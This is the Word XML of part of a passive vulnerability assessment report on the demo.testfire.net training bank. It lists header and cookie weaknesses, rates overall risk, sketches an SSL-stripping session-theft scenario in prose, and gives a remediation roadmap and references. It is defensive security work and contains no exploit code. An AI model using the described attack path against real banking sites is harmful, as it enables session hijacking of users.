            <w:tcW w:type="dxa" w:w="1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Reveals exploitable CVEs → targeted server compromise, RCE possible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Cookie Missing Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09"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Session token sent over HTTP → account takeover via network sniffing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Cookie Missing HttpOnly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09"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Session token accessible via JS → instant exfiltration if XSS present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HTTP Not Redirected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09"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All data transmitted in cleartext on HTTP → passive interception risk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X-Content-Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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MIME confusion attacks possible → risk increases with file upload features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Missing Referrer-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Sensitive URL parameters leaked to third-party referrers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SecurityHeaders Grade: F</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Overall posture indicator — confirms systemic absence of security headers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Error Messages Exposed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Stack traces and internal paths visible on error pages → aids attacker enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>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7.1  Overall Risk Rating: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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The application presents a HIGH overall risk posture. Of the 11 findings identified, 4 are rated HIGH severity. The combination of missing security headers, insecure cookies, server version disclosure, and lack of HTTPS enforcement creates multiple compounding attack vectors. The most critical risk scenario is: an attacker on a shared network strips SSL (VA-02), reads the session cookie transmitted over HTTP (VA-05), and takes over the victim's banking session. This attack requires no technical expertise beyond freely available tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Conclusion &amp; Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The passive vulnerability assessment of demo.testfire.net identified 11 security findings across four risk levels. The application exhibits several classic, well-documented security misconfigurations that are straightforwardly preventable through proper server hardening. No advanced attack techniques are required to exploit the HIGH-severity findings — they are achievable using freely available tools by low-skilled attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>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8.1  Priority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860"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:t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 IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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120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P1 — Immediate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VA-02, VA-07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Enforce HTTPS with 301 redirect + implement HSTS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Low (config change)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C00000" w:sz="1"/>
              <w:left w:val="single" w:color="C00000" w:sz="1"/>
              <w:bottom w:val="single" w:color="C00000" w:sz="1"/>
              <w:right w:val="single" w:color="C00000"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P1 — Immediate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VA-05, VA-06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Add Secure + HttpOnly + SameSite flags to session cookies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Low (config change)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E36C09"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 — Short Term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VA-01, VA-03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Implement Content Security Policy and X-Frame-Options headers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Medium (testing needed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E36C09" w:sz="1"/>
              <w:left w:val="single" w:color="E36C09" w:sz="1"/>
              <w:bottom w:val="single" w:color="E36C09" w:sz="1"/>
              <w:right w:val="single" w:color="E36C09" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E36C09"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 — Short Term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Suppress server version headers; customise error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Low (config change)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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P3 — Medium Term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VA-08, VA-09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Add X-Content-Type-Options and Referrer-Policy headers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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Low (one-line fix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2  Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After applying remediations, the following tools should be used to verify effectiveness:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SecurityHeaders.com — target grade A or higher after all headers are implemented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP ZAP — re-run passive scan to confirm zero header-related alerts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -sI https://domain — manually verify all headers present in response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL Labs (ssllabs.com/ssltest/) — verify HTTPS configuration and certificate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla Observatory — comprehensive security header and TLS report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBd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5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OWASP Top 10 (2021)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https://owasp.org/Top10/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OWASP Testing Guide v4.2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https://owasp.org/www-project-web-security-testing-guide/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OWASP Secure Headers Project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https://owasp.org/www-project-secure-headers/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NIST SP 800-115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https://csrc.nist.gov/publications/detail/sp/800-115/final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Mozilla Web Security Guidelines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https://infosec.mozilla.org/guidelines/web_security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Content Security Policy — MDN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https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP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RFC 6797 — HTTP Strict Transport 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https://tools.ietf.org/html/rfc6797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CWE Top 25 Most Dangerous Software Weaknesses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https://cwe.mitre.org/top25/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IBM AltoroMutual Demo Application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https://demo.testfire.net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Apache Tomcat Security Hardening Guide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https://tomcat.apache.org/tomcat-9.0-doc/security-howto.html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OWASP ZAP Project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https://www.zaproxy.org/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SecurityHeaders.com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https://securityheaders.com/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SSL Labs SSL Server Test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https://www.ssllabs.com/ssltest/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Google CSP Evaluator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2E75B6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">https://csp-evaluator.withgoogle.com/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2E75B6" w:sz="1"/>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0"/>
            <w:right w:type="dxa" w:w="120"/>
          </w:tcMar>
        </w:tcPr>
        <w:p>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:color w:val="595959"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">Confidential  |  For Academic &amp; Portfolio Use Only</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="4680"/>
          <w:tcBorders>
            <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
          </w:tcBorders>
          <w:tcMar>
            <w:top w:type="dxa" w:w="60"/>
            <w:left w:type="dxa" w:w="120"/>
            <w:bottom w:type="dxa" w:w="0"/>
            <w:right w:type="dxa" w:w="0"/>
          </w:tcMar>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>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22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:t xml:space="preserve"> of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2E75B6" w:sz="1"/>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Mar>
            <w:top w:type="dxa" w:w="0"/>
            <w:left w:type="dxa" w:w="0"/>
            <w:bottom w:type="dxa" w:w="60"/>
            <w:right w:type="dxa" w:w="120"/>
          </w:tcMar>
        </w:tcPr>
        <w:p>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="1B3A5C"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t xml:space="preserve">VULNERABILITY ASSESSMENT REPORT</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="3860"/>
          <w:tcBorders>
            <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
            <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
          </w:tcBorders>
          <w:tcMar>
            <w:top w:type="dxa" w:w="0"/>
            <w:left w:type="dxa" w:w="120"/>
            <w:bottom w:type="dxa" w:w="60"/>
            <w:right w:type="dxa" w:w="0"/>
          </w:tcMar>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:color w:val="595959"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t xml:space="preserve">demo.testfire.net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2026-04-21T16:12:39.639Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-21T16:12:39.640Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>